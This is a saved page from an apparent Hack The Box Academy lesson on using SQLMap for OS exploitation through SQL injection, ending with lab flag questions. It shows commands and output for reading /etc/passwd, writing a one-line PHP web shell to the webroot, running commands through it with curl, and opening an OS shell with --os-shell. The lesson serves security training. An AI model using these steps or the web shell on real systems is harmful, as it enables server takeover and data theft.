<!DOCTYPE html>
<!-- saved from url=(0052)https://academy.hackthebox.com/module/58/section/697 -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<title>SQLMap Essentials</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta content="Premium Multipurpose Admin &amp; Dashboard Template" name="description">
<meta content="Themesbrand" name="author">
<link rel="shortcut icon" href="https://academy.hackthebox.com/images/favicon.ico">
<link rel="icon" type="image/png" sizes="16x16" href="https://academy.hackthebox.com/images/favicon-16x16.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://academy.hackthebox.com/images/favicon-32x32.png">
<link rel="apple-touch-icon" href="https://academy.hackthebox.com/images/apple-touch-icon.png">
<link rel="mask-icon" href="https://academy.hackthebox.com/images/safari-pinned-tab.svg">
<link href="./SQLMap Essentials10_files/bootstrap-dark.css" id="bootstrap-style" rel="stylesheet" data-style="dark" type="text/css">
<link href="./SQLMap Essentials10_files/icons.css" rel="stylesheet" type="text/css">
<link href="./SQLMap Essentials10_files/app-dark.css" id="app-style" rel="stylesheet" data-style="dark" type="text/css">
<link href="./SQLMap Essentials10_files/prism.css" id="app-style" rel="stylesheet" data-style="dark" type="text/css">
<link href="./SQLMap Essentials10_files/toastr.min.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="./SQLMap Essentials10_files/ryt3opf.css">
<script type="text/javascript" async="" src="./SQLMap Essentials10_files/awwxrc0h"></script><script type="text/javascript" async="" src="./SQLMap Essentials10_files/uwt.js.download"></script><script type="text/javascript" async="" src="./SQLMap Essentials10_files/insight.min.js.download"></script><script src="./SQLMap Essentials10_files/346791856678772" async=""></script><script type="text/javascript" async="" src="./SQLMap Essentials10_files/fbevents.js.download"></script><script type="text/javascript" async="" src="./SQLMap Essentials10_files/analytics.js.download"></script><script type="text/javascript" src="./SQLMap Essentials10_files/commons.54701049fd6fb8497e9e.js.gz" async="" status="loaded"></script><script type="text/javascript" src="./SQLMap Essentials10_files/intercom.dynamic.js.gz" async="" status="loaded"></script><script type="text/javascript" src="./SQLMap Essentials10_files/twitter-ads.dynamic.js.gz" async="" status="loaded"></script><script type="text/javascript" src="./SQLMap Essentials10_files/linkedin-insight-tag.dynamic.js.gz" async="" status="loaded"></script><script type="text/javascript" src="./SQLMap Essentials10_files/facebook-pixel.dynamic.js.gz" async="" status="loaded"></script><script type="text/javascript" src="./SQLMap Essentials10_files/google-analytics.dynamic.js.gz" async="" status="loaded"></script><script type="text/javascript" async="" src="./SQLMap Essentials10_files/recaptcha__en.js.download" crossorigin="anonymous" integrity="sha384-o1nfdUm9cV7Sx6HxXDsnady1EGmCBTwza/JTA6OSowyOK+wq0YF0+F9jejHVacaR"></script><script type="text/javascript" async="" src="./SQLMap Essentials10_files/analytics.min.js.download"></script><script>
        !function(){var analytics=window.analytics=window.analytics||[];if(!analytics.initialize)if(analytics.invoked)window.console&&console.error&&console.error("Segment snippet included twice.");else{analytics.invoked=!0;analytics.methods=["trackSubmit","trackClick","trackLink","trackForm","pageview","identify","reset","group","track","ready","alias","debug","page","once","off","on","addSourceMiddleware","addIntegrationMiddleware","setAnonymousId","addDestinationMiddleware"];analytics.factory=function(e){return function(){var t=Array.prototype.slice.call(arguments);t.unshift(e);analytics.push(t);return analytics}};for(var e=0;e<analytics.methods.length;e++){var key=analytics.methods[e];analytics[key]=analytics.factory(key)}analytics.load=function(key,e){var t=document.createElement("script");t.type="text/javascript";t.async=!0;t.src="https://cdn.segment.com/analytics.js/v1/" + key + "/analytics.min.js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(t,n);analytics._loadOptions=e};analytics._writeKey="eLzeD0QoARKZ42pc8AGEUYpcFLpYkf0I";analytics.SNIPPET_VERSION="4.13.2";
                analytics.load("eLzeD0QoARKZ42pc8AGEUYpcFLpYkf0I");
                                                        properties = {"platform":"Academy","platform_version":"V1","module_id":58,"module_name":"SQLMap Essentials","module_difficulty":"Easy","section_id":697,"section_title":"OS Exploitation"};
                                                analytics.page(
                    "Module",
                    properties
                );
                                            }
        }();
    </script>
<style>
    .website-screenshot-url {
        height: 22px;
        cursor: text;
        padding-left: 10px;
    }
</style>
<script src="./SQLMap Essentials10_files/api.js.download"></script>
</head>
<body data-layout="detached" data-topbar="colored">
<div class="container-fluid">
<div id="layout-wrapper">
<header id="page-topbar">
<div class="navbar-header">
<div class="container-fluid">
<div class="float-right">
<div class="dropdown d-none d-lg-inline-block ml-1">
<a href="https://academy.hackthebox.com/billing">
<button type="button" class="btn btn-extra-light">
<i class="fad fa-cube text-success mt-1 mr-2"></i>&nbsp;Purchase Cubes
</button>
</a>
</div>
<div class="dropdown d-none d-lg-inline-block ml-1">
<button type="button" class="btn header-item noti-icon waves-effect" data-toggle="fullscreen">
<i class="mdi mdi-fullscreen"></i>
</button>
</div>
<div class="dropdown d-inline-block">
<button type="button" class="btn header-item waves-effect" id="page-header-user-dropdown" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<img class="rounded-circle header-profile-user" src="./SQLMap Essentials10_files/1782606024b767354a8c9d75e1a6323a" alt="Header Avatar">
<span class="d-none d-xl-inline-block ml-1">Tommy034</span>
<i class="mdi mdi-chevron-down d-none d-xl-inline-block"></i>
</button>
<div class="dropdown-menu dropdown-menu-right">
<a class="dropdown-item" href="https://academy.hackthebox.com/billing"><i class="bx bx-wallet font-size-16 align-middle mr-1"></i> Billing</a>
<a class="dropdown-item d-block" href="https://academy.hackthebox.com/settings"><i class="bx bx-wrench font-size-16 align-middle mr-1"></i> Settings</a>
<a class="dropdown-item d-block" href="https://academy.hackthebox.com/vpn"><i class="bx bx-server font-size-16 align-middle mr-1"></i> Vpn Settings</a>
<div class="dropdown-divider"></div>
<form method="POST" action="https://academy.hackthebox.com/logout"> <input type="hidden" name="_token" value="OEgK0JdzOZwGIHHODUXYrzCqZr0uFSlpTj7r9g5E"> <a onclick="$(this).closest(&#39;form&#39;).submit()" class="dropdown-item text-danger" href="https://academy.hackthebox.com/module/58/section/697#"><i class="bx bx-power-off font-size-16 align-middle mr-1 text-danger"></i> Logout</a>
</form>
</div>
</div>
</div>
<div class="d-flex align-items-center">
<div class="navbar-brand-box">
<a href="https://academy.hackthebox.com/dashboard" class="logo">
<span class="logo-sm">
<img src="./SQLMap Essentials10_files/logo.svg" alt="" height="30">
</span>
<span class="logo-lg">
<img src="./SQLMap Essentials10_files/logo.svg" alt="" height="36">
</span>
</a>
</div>
<button type="button" class="btn btn-sm px-3 font-size-16 header-item toggle-btn waves-effect" id="vertical-menu-btn">
<i class="fa fa-fw fa-bars"></i>
</button>
<div class="topnav">
<nav class="navbar navbar-light navbar-expand-lg topnav-menu">
<div class="collapse navbar-collapse" id="topnav-menu-content">
<ul class="navbar-nav active">
<li class="nav-item">
<a class="nav-link" href="https://academy.hackthebox.com/dashboard"><i class="mdi mdi-monitor-dashboard"></i> Dashboard</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://academy.hackthebox.com/modules"><i class="mdi mdi-book-open"></i>
Modules</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://academy.hackthebox.com/paths"><i class="mdi mdi-map-marker-path"></i> Paths</a>
</li>
</ul>
</div>
</nav>
</div>
</div>
</div>
</div>
</header>
<div class="main-content">
<div class="page-content">
<div class="row">
<div class="col-12">
<div class="page-title-box d-flex align-items-center justify-content-between">
<h4 class="page-title mb-0 font-size-18 letter-spacing-1">SQLMap Essentials &nbsp;<i style="cursor:pointer;" data-module-id="58" data-toggle="tooltip" data-title="Toggle To-Do" class="favouriteBtn  fa  fa-heart text-danger" data-original-title="" title=""></i></h4>
<div class="page-title-right">
<ol class="breadcrumb m-0">
<li class="breadcrumb-item"><a href="javascript: void(0);">Page 10</a></li>
<li class="breadcrumb-item active">OS Exploitation</li>
</ol>
</div>
</div>
</div>
</div>
<div class="row justify-content-xl-center">
<div class="col-md-12 col-xl-9 col-xxl-7">
<div class="training-module">
<h1>OS Exploitation</h1>
<hr>
<p>SQLMap has the ability to utilize an SQL Injection to read and write files from the local system outside the DBMS. SQLMap can also attempt to give us direct command execution on the remote host if we had the proper privileges.</p>
<hr>
<h2>File Read/Write</h2>
<p>The first part of OS Exploitation through an SQL Injection vulnerability is reading and writing data on the hosting server. Reading data is much more common than writing data, which is strictly privileged in modern DBMSes, as it can lead to system exploitation, as we will see. For example, in MySql, to read local files, the DB user must have the privilege to <code>LOAD DATA</code> and <code>INSERT</code>, to be able to load the content of a file to a table and then reading that table.</p>
<p>An example of such a command is:</p>
<ul>
<li>
<code>LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE passwd;</code>
</li>
</ul>
<p>While we do not necessarily need to have database administrator privileges (DBA) to read data, this is becoming more common in modern DBMSes. The same applies to other common databases. Still, if we do have DBA privileges, then it is much more probable that we have file-read privileges.</p>
<hr>
<h2>Checking for DBA Privileges</h2>
<p>To check whether we have DBA privileges with SQLMap, we can use the <code>--is-dba</code> option:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash">sqlmap -u <span class="token string">"http://www.example.com/case1.php?id=1"</span> --is-dba</span></span>

<span class="token output">        ___
       __H__
</span><span class="token info punctuation"> ___ ___[)]_____ ___ ___  {1.4.11</span><span class="token command"><span class="token shell-symbol important">#</span><span class="token bash language-bash">stable<span class="token punctuation">}</span></span></span>
<span class="token output">|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[*] starting @ 17:31:55 /2020-11-19/

[17:31:55] [INFO] resuming back-end DBMS 'mysql'
[17:31:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
...SNIP...
current user is DBA: False

[*] ending @ 17:31:56 /2020-11-19
</span></code></pre></div></div>
<p>As we can see, if we test that on one of the previous exercises, we get <code>current user is DBA: False</code>, meaning that we do not have DBA access. If we tried to read a file using SQLMap, we would get something like:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output">[17:31:43] [INFO] fetching file: '/etc/passwd'
[17:31:43] [ERROR] no data retrieved
</span></code></pre></div></div>
<p>To test OS exploitation, let's try an exercise in which we do have DBA privileges, as seen in the questions at the end of this section:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash">sqlmap -u <span class="token string">"http://www.example.com/?id=1"</span> --is-dba</span></span>

<span class="token output">        ___
       __H__
</span><span class="token info punctuation"> ___ ___["]_____ ___ ___  {1.4.11</span><span class="token command"><span class="token shell-symbol important">#</span><span class="token bash language-bash">stable<span class="token punctuation">}</span></span></span>
<span class="token output">|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


[*] starting @ 17:37:47 /2020-11-19/

[17:37:47] [INFO] resuming back-end DBMS 'mysql'
[17:37:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
...SNIP...
current user is DBA: True

[*] ending @ 17:37:48 /2020-11-19/
</span></code></pre></div></div>
<p>We see that this time we get <code>current user is DBA: True</code>, meaning that we may have the privilege to read local files.</p>
<hr>
<h2>Reading Local Files</h2>
<p>Instead of manually injecting the above line through SQLi, SQLMap makes it relatively easy to read local files with the <code>--file-read</code> option:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash">sqlmap -u <span class="token string">"http://www.example.com/?id=1"</span> --file-read <span class="token string">"/etc/passwd"</span></span></span>

<span class="token output">        ___
       __H__
</span><span class="token info punctuation"> ___ ___[)]_____ ___ ___  {1.4.11</span><span class="token command"><span class="token shell-symbol important">#</span><span class="token bash language-bash">stable<span class="token punctuation">}</span></span></span>
<span class="token output">|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


[*] starting @ 17:40:00 /2020-11-19/

[17:40:00] [INFO] resuming back-end DBMS 'mysql'
[17:40:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
...SNIP...
[17:40:01] [INFO] fetching file: '/etc/passwd'
[17:40:01] [WARNING] time-based comparison requires larger statistical model, please wait............................. (done)
[17:40:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:40:07] [WARNING] unable to retrieve the content of the file '/etc/passwd', going to fall-back to simpler UNION technique
[17:40:07] [INFO] fetching file: '/etc/passwd'
do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] y

[17:40:14] [INFO] the local file '~/.sqlmap/output/www.example.com/files/_etc_passwd' and the remote file '/etc/passwd' have the same size (982 B)
files saved to [1]:
[*] ~/.sqlmap/output/www.example.com/files/_etc_passwd (same file)

[*] ending @ 17:40:14 /2020-11-19/
</span></code></pre></div></div>
<p>As we can see, SQLMap said <code>files saved</code> to a local file. We can <code>cat</code> the local file to see its content:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash"><span class="token function">cat</span> ~/.sqlmap/output/www.example.com/files/_etc_passwd</span></span>

<span class="token output">root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...SNIP...
</span></code></pre></div></div>
<p>We have successfully retrieved the remote file.</p>
<hr>
<h2>Writing Local Files</h2>
<p>When it comes it writing files to the hosting server, it becomes much more restricted in modern DMBSes, since we can utilize this to write a Web Shell on the remote server, and hence get code execution and take over the server.</p>
<p>This is why modern DBMSes disable file-write by default and need certain privileges for DBA's to be able to write files. For example, in MySql, the <code>--secure-file-priv</code> configuration must be manually disabled to allow writing data into local files using the <code>INTO OUTFILE</code> SQL query, in addition to any local access needed on the host server, like the privilege to write in the directory we need.</p>
<p>Still, many web applications require the ability for DBMSes to write data into files, so it is worth testing whether we can write files to the remote server. To do that with SQLMap, we can use the <code>--file-write</code> and <code>--file-dest</code> options. First, let's prepare a basic PHP web shell and write it into a <code>shell.php</code> file:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash"><span class="token builtin class-name">echo</span> <span class="token string">'&lt;?php system(<span class="token variable">$_GET</span>["cmd"]); ?&gt;'</span> <span class="token operator">&gt;</span> shell.php</span></span>
</code></pre></div></div>
<p>Now, let's attempt to write this file on the remote server, in the <code>/var/www/html/</code> directory, the default server webroot for Apache. If we didn't know the server webroot, we will see how SQLMap can automatically find it.</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash">sqlmap -u <span class="token string">"http://www.example.com/?id=1"</span> --file-write <span class="token string">"shell.php"</span> --file-dest <span class="token string">"/var/www/html/shell.php"</span></span></span>

<span class="token output">        ___
       __H__
</span><span class="token info punctuation"> ___ ___[']_____ ___ ___  {1.4.11</span><span class="token command"><span class="token shell-symbol important">#</span><span class="token bash language-bash">stable<span class="token punctuation">}</span></span></span>
<span class="token output">|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


[*] starting @ 17:54:18 /2020-11-19/

[17:54:19] [INFO] resuming back-end DBMS 'mysql'
[17:54:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
...SNIP...
do you want confirmation that the local file 'shell.php' has been successfully written on the back-end DBMS file system ('/var/www/html/shell.php')? [Y/n] y

[17:54:28] [INFO] the local file 'shell.php' and the remote file '/var/www/html/shell.php' have the same size (31 B)

[*] ending @ 17:54:28 /2020-11-19/
</span></code></pre></div></div>
<p>We see that SQLMap confirmed that the file was indeed written:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output">[17:54:28] [INFO] the local file 'shell.php' and the remote file '/var/www/html/shell.php' have the same size (31 B)
</span></code></pre></div></div>
<p>Now, we can attempt to access the remote PHP shell, and execute a sample command:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash"><span class="token function">curl</span> http://www.example.com/shell.php?cmd<span class="token operator">=</span>ls+-la</span></span>

<span class="token output">total 148
drwxrwxrwt 1 www-data www-data   4096 Nov 19 17:54 .
drwxr-xr-x 1 www-data www-data   4096 Nov 19 08:15 ..
-rw-rw-rw- 1 mysql    mysql       188 Nov 19 07:39 basic.php
...SNIP...
</span></code></pre></div></div>
<p>We see that our PHP shell was indeed written on the remote server, and that we do have command execution over the host server.</p>
<hr>
<h2>OS Command Execution</h2>
<p>Now that we confirmed that we could write a PHP shell to get command execution, we can test SQLMap's ability to give us an easy OS shell without manually writing a remote shell. SQLMap utilizes various techniques to get a remote shell through SQL injection vulnerabilities, like writing a remote shell, as we just did, writing SQL functions that execute commands and retrieve output or even using some SQL queries that directly execute OS command, like <code>xp_cmdshell</code> in Microsoft SQL Server. To get an OS shell with SQLMap, we can use the <code>--os-shell</code> option, as follows:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash">sqlmap -u <span class="token string">"http://www.example.com/?id=1"</span> --os-shell</span></span>

<span class="token output">        ___
       __H__
</span><span class="token info punctuation"> ___ ___[.]_____ ___ ___  {1.4.11</span><span class="token command"><span class="token shell-symbol important">#</span><span class="token bash language-bash">stable<span class="token punctuation">}</span></span></span>
<span class="token output">|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[*] starting @ 18:02:15 /2020-11-19/

[18:02:16] [INFO] resuming back-end DBMS 'mysql'
[18:02:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
...SNIP...
[18:02:37] [INFO] the local file '/tmp/sqlmapmswx18kp12261/lib_mysqludf_sys8kj7u1jp.so' and the remote file './libslpjs.so' have the same size (8040 B)
[18:02:37] [INFO] creating UDF 'sys_exec' from the binary UDF file
[18:02:38] [INFO] creating UDF 'sys_eval' from the binary UDF file
[18:02:39] [INFO] going to use injected user-defined functions 'sys_eval' and 'sys_exec' for operating system command execution
[18:02:39] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER

os-shell&gt; ls -la
do you want to retrieve the command standard output? [Y/n/a] a

[18:02:45] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
No output
</span></code></pre></div></div>
<p>We see that SQLMap defaulted to <code>UNION</code> technique to get an OS shell, but eventually failed to give us any output <code>No output</code>. So, as we already know we have multiple types of SQL injection vulnerabilities, let's try to specify another technique that has a better chance of giving us direct output, like the <code>Error-based SQL Injection</code>, which we can specify with <code>--technique=E</code>:</p>
<div class="window_container"><div class="window_content">
                <div class="window_top">
                    <span class="window_dot bg-danger"></span>
                    <span class="window_dot bg-warning"></span>
                    <span class="window_dot bg-success"></span>
                    <span class="window_title"></span>
                </div>
            <pre class=" language-shell-session" style="line-height: 0px;"><code class=" language-shell-session"><span class="token output"><span class="text-gray">Tommy034@htb</span><span class="text-success">[/htb]</span></span><span class="token command"><span class="token shell-symbol important">$</span> <span class="token bash language-bash">sqlmap -u <span class="token string">"http://www.example.com/?id=1"</span> --os-shell --technique<span class="token operator">=</span>E</span></span>

<span class="token output">        ___
       __H__
</span><span class="token info punctuation"> ___ ___[,]_____ ___ ___  {1.4.11</span><span class="token command"><span class="token shell-symbol important">#</span><span class="token bash language-bash">stable<span class="token punctuation">}</span></span></span>
<span class="token output">|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org


[*] starting @ 18:05:59 /2020-11-19/

[18:05:59] [INFO] resuming back-end DBMS 'mysql'
[18:05:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
...SNIP...
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
&gt; 4

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y

[18:06:07] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
&gt; 1

[18:06:09] [WARNING] unable to automatically parse any web server path
[18:06:09] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[18:06:09] [WARNING] potential permission problems detected ('Permission denied')
[18:06:10] [WARNING] unable to upload the file stager on '/var/www/'
[18:06:10] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[18:06:11] [INFO] the file stager has been successfully uploaded on '/var/www/html/' - http://www.example.com/tmpumgzr.php
[18:06:11] [INFO] the backdoor has been successfully uploaded on '/var/www/html/' - http://www.example.com/tmpbznbe.php
[18:06:11] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell&gt; ls -la

do you want to retrieve the command standard output? [Y/n/a] a

command standard output:
---
total 156
drwxrwxrwt 1 www-data www-data   4096 Nov 19 18:06 .
drwxr-xr-x 1 www-data www-data   4096 Nov 19 08:15 ..
-rw-rw-rw- 1 mysql    mysql       188 Nov 19 07:39 basic.php
...SNIP...
</span></code></pre></div></div>
<p>As we can see, this time SQLMap successfully dropped us into an easy interactive remote shell, giving us easy remote code execution through this SQLi.</p>
<div class="card bg-light">
<div class="card-body">
<p class="mb-0">Note: SQLMap first asked us for the type of language used on this remote server, which we know is PHP. Then it asked us for the server web root directory, and we asked SQLMap to automatically find it using 'common location(s)'. Both of these options are the default options, and would have been automatically chosen if we added the '--batch' option to SQLMap.</p>
</div>
</div>
<p>With this, we have covered all of the main functionality of SQLMap.</p>
<div id="screen" style="height: 600px; border: 1px solid;">
<div class="screenPlaceholder">
<div class="instanceLoading" style="display: none;">
<h1 class="text-center" style="margin-top: 270px;"><i class="fa fa-circle-notch fa-spin"></i></h1>
<div class="text-center">Instance is starting...</div>
</div>
<div class="instanceTerminating" style="display: none;">
<h1 class="text-center" style="margin-top: 270px;"><i class="fa fa-circle-notch fa-spin"></i></h1>
<div class="text-center">Terminating instance...</div>
</div>
<div class="row instanceStart max-width-canvas">
<div class="col-4"></div>
<div class="col-4">
<button class=" startInstanceBtn btn btn-primary btn-lg btn-block" style="margin-top: 270px;">Start Instance</button>
<p class="text-center mt-2 font-size-13 font-secondary">
<span class="text-success spawnsLeft">
<i class="fal fa-infinity"></i>
</span> / 1 spawns left
</p>
</div>
<div class="col-4"></div>
</div>
</div>
</div>
<div class="row align-center justify-center my-4">
<div class="col-5 justify-start">
<button style="display:none;" target="_blank" class="instance-button fullScreenBtn btn btn-light btn-sm float-left "><i class="fad fa-expand text-success mr-1"></i> &nbsp;Full Screen</button>
<button style="display:none;" class="instance-button terminateInstanceBtn btn btn-light btn-sm ml-2"><i class="fad fa-times text-danger"></i> &nbsp;Terminate</button>
<button style="display:none;" class="instance-button resetInstanceBtn btn btn-light btn-sm ml-1"><i class="fad fa-sync text-warning mr-2"></i> &nbsp;Reset</button>
<div class="btn-group " role="group">
<button style="display:none;cursor: default;" class="instance-button extendInstanceBtn btn btn-light btn-sm ml-1">Life Left: <span class="lifeLeft"></span>m</button>
<button style="display:none;" data-toggle="tooltip" data-title="Extend Life" class=" extendInstanceBtn extendInstanceBtnClicker btn btn-light btn-sm " data-original-title="" title=""><i class="fa fa-plus text-success"></i></button>
</div>
</div>
<div id="statusText" class="col-7 justify-end pt-2 pr-2 font-size-small text-right">Waiting to start...</div>
</div>
<div class="card" id="questionsDiv">
<div class="card-body">
<div class="row">
<div class="col-9">
<h4 class="card-title mt-0 font-size-medium">Questions</h4>
<p class="card-title-desc font-size-large font-size-15">Answer the question(s) below to complete this Section and earn cubes!</p>
<p class="card-title-desc font-size-large font-size-15">
Target: <span class="text-success"><span class="target" style="cursor:pointer;"><span class="spawnTargetBtn">Click here to spawn the target system!</span></span></span>
<button class="resetTargetBtn btn btn-light btn-sm " data-toggle="tooltip" data-title="Reset Target" style="cursor: pointer; display: none;" data-original-title="" title=""><i class="fad fa-sync text-warning"></i></button>
<br>
<span class="targetLifeTimeContainer" style="display: none;">Time Left: <span class="targetLifeTime  font-size-15">0</span> minutes</span>
</p>
</div>
<div class="col-3 text-right float-right">
<button class="btn btn-light bg-color-blue-nav mt-2" data-toggle="modal" data-target="#cheatSheetModal"><i class="fad fa-file-alt mr-2"></i> Cheat Sheet</button>
</div>
</div>
<div>
<div>
<label class="module-question" for="434"><span class="badge badge-soft-dark font-size-14 mr-2">+ 1 <i class="fad fa-cube text-success"></i></span> Try to use SQLMap to read the file "/var/www/html/flag.txt".</label>
<div class="row">
<div class=" col-lg-8  mb-4">
<input class="form-control bg-color-blue-nav" id="answer434" type="text" color="green" placeholder="Submit your answer here..." maxlength="191">
</div>
<div class="col-lg-2 mb-4">
<button class="btn btn-primary btn-block btnAnswer" id="btnAnswer434" data-question-id="434"><i class="fad fa-flag-checkered mr-2"></i> Submit</button>
</div>
<div class="col-lg-2 mb-4">
</div>
</div>
<div class=" custom-hr "></div>
</div>
<div>
<label class="module-question" for="435"><span class="badge badge-soft-dark font-size-14 mr-2">+ 1 <i class="fad fa-cube text-success"></i></span> Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host.</label>
<div class="row">
<div class=" col-lg-8  mb-4">
<input class="form-control bg-color-blue-nav" id="answer435" type="text" color="green" placeholder="Submit your answer here..." maxlength="191">
</div>
<div class="col-lg-2 mb-4">
<button class="btn btn-primary btn-block btnAnswer" id="btnAnswer435" data-question-id="435"><i class="fad fa-flag-checkered mr-2"></i> Submit</button>
</div>
<div class="col-lg-2 mb-4">
<button class="btn btn-outline-warning btn-block" data-toggle="modal" id="hintBtn435" data-target="#hint435"><i class="fad fa-life-ring mr-2"></i> Hint</button>
</div>
</div>
<div class=""></div>
</div>
</div>
</div>
</div>
</div>
<div class="card bg-color-blue-nav" style="margin: 30px 0">
<div class="card-body">
<a href="https://academy.hackthebox.com/module/58/section/530" class="btn btn-light module-button py-2" style="float: left"><i class="fa fa-arrow-alt-left mr-1"></i> Previous</a>
<form action="https://academy.hackthebox.com/module" method="POST" class="form-inline" id="completeForm" style="float: right">
<input type="hidden" name="module_id" value="58">
<input type="hidden" name="page_id" value="11">
<input type="hidden" name="completed" value="1">
<button id="completeBtn" class="btn btn-outline-success" style="display:none;"><i class="fa fa-check-circle"></i> Mark Complete &amp; Next</button>
</form>
